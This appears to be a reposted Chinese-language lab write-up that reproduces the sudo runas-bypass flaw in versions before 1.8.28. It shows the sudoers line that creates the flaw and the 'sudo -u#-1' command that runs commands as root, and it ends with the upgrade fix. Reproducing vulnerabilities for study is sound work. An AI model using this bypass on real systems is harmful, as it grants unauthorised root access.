Sudo提權漏洞復現


Sudolinux的系統命令,讓普通賬號以root方式執行命令

 

正常來說如果普通用戶需要用sudo,需要修改配置文件/etc/sudoers,sudo使用權賦予該用戶

 

而這個漏洞使得普通用戶也可以繞過安全策略,執行敏感命令

漏洞影響的版本是<1.8.28

 

實驗環境:kali

 

漏洞復現過程

 

1、 查看sudo版本

 

Sudo –V

 

 

 

 

 

2、 修改配置文件:vim/etc/sudoers root(ALL:ALL)ALL添加一行

 

Test ALL=(ALL,!root)ALL

 

 

第一個ALL表示用戶可以在任意地方使用sudo

第二個(ALL,!root)表示命令可以被除了root以外的任意用戶執行

最后一個ALL表示允許被執行

整體代碼:test用戶可以使用sudo,是除了root以外的任意用戶去執行

 

 

 

注意:需要創建test用戶:useradd  test   passwd test

 

 

 

 

 

 

 

3、 切換到test用戶

 

Su test

 

然后sudo id(查看rootID

 

 

 

發現沒有權限執行

 

4、 使用以下方法去執行想要的執行的命令

 

Sudo –u#數字 命令

 

其中數字范圍:-1~4294967295,命令是系統命令

 

數字-1或者最大代表root用戶

 

修復方法:更新sudo版本>=1.8.28

 

該漏洞比較雞肋,需要管理員修改配置文件

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM